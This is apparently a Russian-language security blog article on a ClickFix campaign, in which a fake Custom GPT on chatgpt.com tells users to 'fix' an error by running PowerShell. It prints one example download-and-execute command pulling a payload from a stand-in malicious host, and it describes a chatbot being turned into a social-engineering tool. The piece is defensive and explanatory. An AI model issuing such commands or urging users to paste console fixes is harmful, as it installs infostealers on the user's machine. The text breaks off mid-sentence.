Введение: когда искусственный интеллект становится вектором атаки
Каждый раз, когда индустрия находит способ обуздать очередную технологию, злоумышленники превращают её в оружие. Прямо сейчас мы наблюдаем тревожный тренд: хакеры перестали ломать защиту в лоб и начали использовать слепое доверие к ИИ-сервисам против самих пользователей. Исследователи из компании Huntress зафиксировали кампанию, где легитимные функции OpenAI применяются для изощренных атак с использованием техники ClickFix.
Представьте ситуацию: разработчик заходит навыкаться в кастомный чат-бот, видит знакомый и абсолютно безопасный домен в адресной строке, расслабляется — и в этот момент его критическое мышление отключается (примерно так же мы слепо копируем команды со Stack Overflow в три часа ночи). Давайте разберем механику этой ловушки изнутри, чтобы понять, как безобидный диалог с ботом превращается в заражение системы.
Анатомия угрозы: как вредоносный бот обосновался на chatgpt.com
Главным вектором кампании стало злоупотребление функцией Custom GPT, которая позволяет создавать кастомизированные версии чат-ботов. Злоумышленники развернули фальшивую модель под названием «Plus 5.6», имитирующую официальные обновления OpenAI.
Поскольку бот функционирует внутри официальной экосистемы, ссылки на него ведут на доверенный домен. Это сводит на нет эффективность традиционных средств фильтрации трафика по доменному имени. Аналитики отмечают, что подобные кампании часто используют маркеры легитимных сессий, например:
- Запросы к
https://chatgpt.com/api/auth/sessionдля маскировки под системный трафик - Манипуляции с поисковой выдачей через авторитетные хостинги (по аналогии со старыми схемами вроде поддельных
adobe hosts) - Ссылки на внешние ресурсы через легитимные редиректы
Механика атаки ClickFix: от чата до заражения системы
Но как именно злоумышленники заставляют пользователя самостоятельно открыть дверь вирусу? Здесь на сцену выходит концепция ClickFix, которая превращает обычную техническую неполадку в идеальную ловушку.
Вместо скачивания подозрительного .exe файла, пользователь, запустивший фейковый GPT, получает сгенерированный «ответ с ошибкой». Для ее исправления бот любезно просит выполнить простое действие: «исправить рассинхронизацию буфера обмена» через консольную команду PowerShell. Реальный сценарий атаки выглядит предельно банально:
# Пример вредоносной команды, которую злоумышленники маскируют под исправление ошибки UI:
powershell -windowstyle hidden -command "IEX (New-Object Net.WebClient).DownloadString('https://malicious-domain.com/payload.ps1')"
Инженер технической поддержки крупного fintech-сервиса копирует этот «фикс» из интерфейса чата, открывает терминал от имени администратора, вставляет строку — и в ту же секунду на машине поселяется незаметный инфостилер.
Как защититься от нового вектора угроз
Поскольку атака эксплуатирует не уязвимости кода, а доверие к интерфейсу и человеческий фактор, стандартные антивирусы часто пропускают начальную фазу заражения. Переход к проактивной обороне требует конкретных шагов от каждого инженера и администратора:
- Ограничить выполнение неофициальных скриптов PowerShell через групповые политики (GPO) или MDM-решения.
- Проводить регулярный тренинг сотрудников по распознаванию атак типа ClickFix (когда пользователю предлагают «исправить ошибку» через консоль).
- Внедрить строгий контроль за использованием сторонних Custom GPT в корпоративной среде.
Заключение
Инцидент с фальшивыми моделями ChatGPT и атаками ClickFix демонстрирует суровую реальность: доверие к знакомым доменам стало уязвимостью нулевого дня нашего собственного мозга. Защита периметра больше не работает, когда угроза приходит изнутри легитимных облачных сервисов. Проверьте свои настройки PowerShell прямо сегодня и поделитесь этой статьей с к